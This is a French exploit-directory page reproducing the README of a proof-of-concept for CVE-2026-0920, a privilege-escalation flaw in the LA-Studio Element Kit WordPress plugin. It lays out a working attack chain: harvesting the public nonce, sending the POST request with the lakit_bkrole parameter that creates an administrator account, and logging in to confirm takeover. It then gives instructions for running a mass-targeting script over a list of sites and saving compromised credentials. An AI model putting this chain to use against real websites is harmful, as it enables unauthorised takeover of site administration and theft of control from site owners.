Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-0920- — LA-Studio Element Kit for Elementor <= 1.5.6.3 - Élévation de privilèges non authentifiée via une porte dérobée permettant la création d'un utilisateur administrateur via le paramètre lakit_bkrole | Kitploit
Outils/GitHubGitHub/nxploited/cve-2026-0920-
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebApprentissage et Éducation
GitHubnxploited/cve-2026-0920-

CVE-2026-0920-

LA-Studio Element Kit for Elementor <= 1.5.6.3 - Élévation de privilèges non authentifiée via une porte dérobée permettant la création d'un utilisateur administrateur via le paramètre lakit_bkrole

Voir le dépôt
217il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-0920-

LA-Studio Element Kit pour Elementor <= 1.5.6.3 - Élévation de privilèges non authentifiée via backdoor permettant la création d'un utilisateur administrateur via le paramètre lakit_bkrole

   _____   _____   ___ __ ___  __      __  ___ ___ __  
  / __\ \ / / __|_|_  )  \_  )/ / ___ /  \/ _ \_  )  \ 
 | (__ \ V /| _|___/ / () / // _ \___| () \_, // / () |
  \___| \_/ |___| /___\__/___\___/    \__/ /_//___\__/ 

Telegram CVE CVSS Python License


📡 L'exploit est publié ici en premier. Suivez @KNxploited sur Telegram — votre flux d'élite pour les CVE fraîchement divulguées, les PoC fonctionnels et la recherche en sécurité de précision. Mis à jour sans relâche. Conçu pour ceux qui gardent une longueur d'avance.


🧠 Présentation

CVE-2026-0920 est une vulnérabilité critique avec un score CVSS de 9.8 découverte dans le plugin WordPress LA-Studio Element Kit for Elementor.

Le défaut se situe dans la fonction ajax_register_handle(), qui traite les inscriptions d'utilisateurs non authentifiés via AJAX. La fonction n'impose aucune restriction sur le paramètre lakit_bkrole — permettant à un attaquant totalement non authentifié de s'attribuer lui-même le rôle administrator lors de l'inscription, réalisant ainsi une prise de contrôle complète de l'administration WordPress en une seule requête.

ChampDétails
ID CVECVE-2026-0920
PluginLA-Studio Element Kit for Elementor
Sluglakit / la-studio-element-kit-for-elementor
Versions affectéesToutes les versions jusqu'à la 1.5.6.3 incluse
Type de vulnérabilitéÉlévation de privilèges non authentifiée / Création d'administrateur
Vecteur d'attaqueRéseau — Aucune authentification requise
Score CVSS 3.19.8 CRITIQUE
Vecteur CVSSAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
ImpactPrise de contrôle totale de l'administrateur WordPress
ChercheurNxploited

💀 Analyse approfondie de la vulnérabilité

La cause racine est l'absence de vérification des capacités du rôle dans le gestionnaire d'inscription AJAX du plugin :

// Registered with no authentication requirement
add_action('wp_ajax_nopriv_lakit_ajax', [$this, 'ajax_register_handle']);

public function ajax_register_handle() {
    $actions = json_decode(stripslashes($_POST['actions']), true);

    foreach ($actions as $req) {
        if ($req['action'] === 'register') {
            $data = $req['data'];

            $user_data = [
                'user_login' => $data['username'],
                'user_pass'  => $data['password'],
                'user_email' => $data['email'],
                'role'       => $data['lakit_bkrole'], // ← ATTACKER CONTROLLED
            ];

            // No validation of $data['lakit_bkrole'] against allowed roles
            wp_insert_user($user_data); // Administrator created silently
        }
    }
}

Pourquoi c'est critique :

  • wp_ajax_nopriv_* = accessible par n'importe qui sans aucune authentification
  • lakit_bkrole accepte n'importe quelle chaîne de rôle WordPress — y compris administrator
  • Une seule requête POST crée un compte administrateur entièrement privilégié
  • Le nonce requis est exposé publiquement dans le HTML/JS du front-end du site
  • Aucune limitation de débit, aucune application de CAPTCHA par défaut, aucune vérification par e-mail requise

⚔️ Chaîne d'exploitation

Step 1 — Nonce Harvesting
──────────────────────────────────────────────────────────────────────
GET / (or /index.php, /home, /?page_id=1)

Search HTML/JS for:
  "ajaxNonce": "<value>"         ← Inline JSON config
  ajaxNonce: '<value>'           ← JS variable
  data-ajaxnonce="<value>"       ← HTML attribute

Nonce is publicly accessible — no login required.
  ↓
ajaxNonce extracted ✔️

──────────────────────────────────────────────────────────────────────
Step 2 — Admin Account Registration
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php

  action  = lakit_ajax
  _nonce  = <extracted nonce>
  actions = {
    "req1": {
      "action": "register",
      "data": {
        "email":                  "[email protected]",
        "password":               "adminSA",
        "username":               "Nx_admin",
        "lakit_field_log":        "yes",   ← use supplied username
        "lakit_field_pwd":        "yes",   ← use supplied password
        "lakit_field_cpwd":       "no",    ← skip password confirm
        "lakit_bkrole":           "1",     ← trigger admin role injection
        "lakit_recaptcha_response": ""
      }
    }
  }
  ↓
Administrator account silently created ✔️

──────────────────────────────────────────────────────────────────────
Step 3 — Full Admin Verification
──────────────────────────────────────────────────────────────────────
POST /wp-login.php
  log = Nx_admin
  pwd = adminSA
  ↓
Session cookies obtained → GET /wp-admin/plugin-install.php
  ↓
Plugin install page accessible = CONFIRMED FULL ADMIN ✔️

⚙️ Prérequis

pip install requests colorama
DépendanceObjectif
requestsRequêtes HTTP, gestion de session, gestion des cookies
coloramaSortie terminal colorée sur toutes les plateformes
threadingTraitement concurrent de plusieurs cibles
reExtraction du nonce par expressions régulières depuis le HTML/JS

Python 3.10+ recommandé (utilise les annotations de type union str | None).


📂 Structure des fichiers

CVE-2026-0920/
├── CVE-2026-0920.py          # Main exploit script
├── list.txt                  # Target URLs — one per line
├── success_results.txt       # Auto-generated: pwned targets + credentials

🚀 Utilisation

Étape 1 — Configurer les identifiants (Optionnel)

Ouvrez CVE-2026-0920.py et modifiez les constantes en haut du fichier pour définir les détails de votre compte administrateur :

ADMIN_EMAIL    = "[email protected]"   # Email for the new admin account
ADMIN_PASSWORD = "adminSA"                 # Password for the new admin account
ADMIN_USERNAME = "Nx_admin"               # Username for the new admin account

Étape 2 — Préparer les cibles

Créez list.txt avec une URL cible par ligne :

https://target1.com
https://target2.com
http://target3.com

Les URL sans schéma reçoivent automatiquement le préfixe https://.


Étape 3 — Lancer l'exploit

python CVE-2026-0920.py

Vous serez invité à saisir :

Télécharger l’outil